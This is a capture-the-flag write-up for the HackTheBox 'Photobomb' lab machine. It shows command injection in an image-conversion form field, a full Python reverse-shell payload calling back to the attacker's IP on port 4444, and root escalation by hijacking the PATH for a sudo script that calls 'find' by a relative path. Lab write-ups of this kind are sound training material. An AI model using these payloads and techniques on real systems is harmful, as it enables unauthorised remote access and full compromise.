HackTheBox Writeup: Photobomb
Enum
nmap 10.10.11.182 -sCV -A -T5
Find two open ports 22 and 80 lets check out this
Add domain
photobomb.htb in /etc/hosts file
This is site running port 80
Lets check web enum with feroxbuster;
Yes we finds some directories; Check this http://photobomb.htb/printer but oops we dont have any credential for this login form :(
Browse the website and found a javascript file
photobomb.js
with the credentialusername:pH0t0 pass:b0Mb! :)
and goto this tada :)
then go to login form and fill creds and welcome photo gallery panel ;
There are some specious form with
POST
action to download the image.
Intercept it with BurpSuite to get the request…
We send the request, and we got the image with
png
extension downloaded.
Humm. As the Burp request, and at the HTML code, we know that the source image is with
jpg
, so i guess there is some internal process to convert the extension fromjpg
topng
.
So we will tried to inject to the convert process.
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=png;ping -c 20 10.10.14.42&dimensions=1000x1500
We test if there are code injection that will ping to our machine.
At our machine, open new tab and start to hear
ping-pong
withtcpdump
tcpdump -nni tun0
And we got the
ping-pong
request coming:
So we will replace the
ping
with our reverse shell code;
export RHOST="10.10.14.42";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
Finally the Burp Request will like this;
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 295
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=png;export RHOST="10.10.14.42";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'&dimensions=1000x1500
We open
nc
to listen at our machine:
nc -lvnp 4444
We send request at Burp. And we got shell;
Foothold
Check the
id
:
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
Check the
sudo
permission:
wizard@photobomb:~/photobomb$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
Take a look at
cleanup.sh
cat /opt/cleanup.sh
Output:
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
Well, there a
find
command without absolute path.
Privilege Escalate
Here step to get root.
Move to
/tmp
and createfind
cd /tmp
touch find
echo "/bin/bash -p" > find
chmod +x find
Run the
/opt/cleanup.sh
with environment set
sudo PATH=/tmp:$PATH /opt/cleanup.sh
Output:
wizard@photobomb:/tmp$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
sudo PATH=/tmp:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb#root@photobomb:/home/wizard/photobomb# id
id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:/home/wizard/photobomb#